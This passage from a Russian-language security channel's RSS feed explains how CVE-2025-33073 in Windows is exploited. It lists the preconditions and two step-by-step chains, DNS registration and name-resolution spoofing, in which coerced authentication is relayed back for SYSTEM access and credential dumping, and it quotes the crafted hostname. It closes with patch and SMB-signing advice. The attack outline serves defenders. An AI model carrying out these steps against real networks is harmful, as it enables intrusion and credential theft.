<figure class="wp-block-image"><img width="1024" height="783" src="/wp-content/uploads/2025/06/photo_308@27-06-2025_17-40-56-1024x783.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2025/06/photo_308@27-06-2025_17-40-56-1024x783.jpg 1024w, /wp-content/uploads/2025/06/photo_308@27-06-2025_17-40-56-300x229.jpg 300w, /wp-content/uploads/2025/06/photo_308@27-06-2025_17-40-56-768x587.jpg 768w, /wp-content/uploads/2025/06/photo_308@27-06-2025_17-40-56.jpg 1280w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></figure>
<figure class="wp-block-image"><img width="1024" height="730" src="/wp-content/uploads/2025/06/photo_309@27-06-2025_17-40-56-1024x730.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2025/06/photo_309@27-06-2025_17-40-56-1024x730.jpg 1024w, /wp-content/uploads/2025/06/photo_309@27-06-2025_17-40-56-300x214.jpg 300w, /wp-content/uploads/2025/06/photo_309@27-06-2025_17-40-56-768x548.jpg 768w, /wp-content/uploads/2025/06/photo_309@27-06-2025_17-40-56.jpg 1063w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></figure>
<p><span class="hashtag">#detect</span> <span class="hashtag">#cve</span> <span class="hashtag">#win</span> <span class="hashtag">#sigma</span> <span class="hashtag">#rules</span><br />
<a href="https://t.me/ptescalator" rel="noopener" target="_blank">@ptescalator</a></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Эксплуатация CVE-2025-33073</title>
		<link>/exploitation-of-cve-2025-33073/</link>
		
		<dc:creator><![CDATA[global_author]]></dc:creator>
		<pubDate>Tue, 24 Jun 2025 18:12:48 +0000</pubDate>
				<category><![CDATA[Разное]]></category>
		<category><![CDATA[cve]]></category>
		<category><![CDATA[offensive]]></category>
		<category><![CDATA[win]]></category>
		<guid isPermaLink="false">/%d1%82%d0%b5%d0%bf%d0%b5%d1%80%d1%8c-%d0%bf%d1%80%d0%be-%d1%8d%d0%ba%d1%81%d0%bf%d0%bb%d1%83%d0%b0%d1%82%d0%b0%d1%86%d0%b8%d1%8e/</guid>

					<description><![CDATA[🧤 Теперь про эксплуатацию уязвимости CVE-2025-33073: • Учетная запись в домене с самыми рядовыми привилегиями. • На атакуемом устройстве не настроено принудительное требование подписи SMB. • На атакуемом устройстве не стоит патч,…]]></description>
										<content:encoded><![CDATA[<p>🧤 <strong>Теперь про эксплуатацию </strong><a href="https://t.me/ptescalator/389" rel="noopener" target="_blank">уязвимости</a><strong> CVE-2025-33073:</strong></p>
<p>• Учетная запись в домене с самыми рядовыми привилегиями.<br />
• На атакуемом устройстве не настроено принудительное требование подписи SMB.<br />
• На атакуемом устройстве не стоит патч, устраняющий уязвимость CVE-2025-33073, который был выпущен в июне 2025 года.</p>
<p>И дополнительно одно из двух:</p>
<p>• Либо возможность регистрации DNS-записи в домене (по умолчанию могут все пользователи домена).<br />
• Либо нахождение в одной широковещательной сети с атакуемым устройством (проведение атаки NBNS, LLMNR и mDNS-спуфинга).</p>
<p>Рассмотрим два варианта эксплуатации с дампом локальных учетных данных из <code>SAM</code> и <code>SECURITY</code>. </p>
<p>1️⃣ <strong>Первый вариант с DNS-записью </strong><em>(</em><a href="https://sun9-63.userapi.com/s/v1/if2/FUPFSkgw31jScZIbAjTPBLP0Sqh4fyjiiC7fJ2uTJJn9J8l2TMVzqc2aPnaliociGexQCU3pXf0pClC8173EdThC.jpg?quality=95&#038;as=32x18,48x27,72x41,108x61,160x91,240x137,360x205,480x273,540x307,640x364,720x410,1080x615,1280x729,1440x820,2342x1333&#038;from=bu&#038;cs=2342x0" rel="noopener" target="_blank">скриншот 1</a><em>)</em>:</p>
<p>1. Атакующий регистрирует DNS-запись формата <code>localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA</code></p>
<p>2. Атакующий выполняет Coerce-атаку на устройство без SMB Signing.</p>
<p>3. Устройство разрешает имя по DNS, в котором получает IP-адрес атакующего.</p>
<p>4. Устройство проходит аутентификацию на сервере атакующего.</p>
<p>5. Атакующий выполняет Relay-атаку на это же устройство, получает аутентифицированную сессию с правами SYSTEM.</p>
<p>2️⃣ <strong>Второй вариант со спуфингом </strong><em>(</em><a href="https://sun9-32.userapi.com/s/v1/if2/sFNwiLpO-Nh0me85i7KSiunUhGl8dfGiqsGzTYuOq8sv_7bJVAOPloJWvHVtb47LxnTocvFx6EVeDMsdKeA7Xzcp.jpg?quality=95&#038;as=32x14,48x21,72x31,108x47,160x70,240x105,360x157,480x209,540x236,640x279,720x314,1080x471,1280x559,1440x628,2342x1022&#038;from=bu&#038;cs=2342x0" rel="noopener" target="_blank">скриншот 2</a><em>)</em><strong>:<br />
</strong><br />
1. Атакующий запускает спуфинг с ответом на имя хоста <code>localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA</code></p>
<p>2. Атакующий выполняет Coerce-атаку на устройство в локальной сети.</p>
<p>3. Устройство пытается разрешить имя по DNS, не находит его и переходит к многоадресным протоколам.</p>
<p>4. Атакующий сообщает устройству, что имя принадлежит ему.</p>
<p>5. Устройство проходит аутентификацию на сервере атакующего.</p>
<p>6. Атакующий выполняет Relay-атаку на это же устройство, получает аутентифицированную сессию с правами SYSTEM.</p>
<p>Вместо вывода хочется подчеркнуть, что эта уязвимость стала результатом многолетних исследований нескольких специалистов и, вероятно, кем-то она могла быть обнаружена и использована ранее. Никто не знает, сколько еще таких уязвимостей будет обнаружено. Но в этом случае, как и в большинстве других, применив лучшие практики по защите заранее, можно избежать серьезных последствий при появлении подобных уязвимостей даже без установки обновления.</p>
<p> <strong>Рекомендации по защите от уязвимости:</strong></p>
<p><strong>•</strong> Установите <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-33073" rel="noopener" target="_blank">обновления безопасности</a> от 10 июня 2025 года.</p>
<p><strong>•</strong> Настройте <a href="https://learn.microsoft.com/en-us/troubleshoot/windows-server/networking/overview-server-message-block-signing" rel="noopener" target="_blank">принудительное требование</a> подписи SMB для SMB-служб контроллеров и рабочих станций.</p>
<p>В следующих постах расскажем, как детектить уязвимость 😉</p>
<figure class="wp-block-image"><img width="1024" height="447" src="/wp-content/uploads/2025/06/photo_306@24-06-2025_18-12-48-1024x447.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2025/06/photo_306@24-06-2025_18-12-48-1024x447.jpg 1024w, /wp-content/uploads/2025/06/photo_306@24-06-2025_18-12-48-300x131.jpg 300w, /wp-content/uploads/2025/06/photo_306@24-06-2025_18-12-48-768x335.jpg 768w, /wp-content/uploads/2025/06/photo_306@24-06-2025_18-12-48.jpg 1280w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></figure>
<p><span class="hashtag">#cve</span> <span class="hashtag">#win</span> <span class="hashtag">#offensive</span><br />
<a href="https://t.me/ptescalator" rel="noopener" target="_blank">@ptescalator</a></p>
]]></content:encoded>
					
		
		
			</item>
	</channel>
</rss>
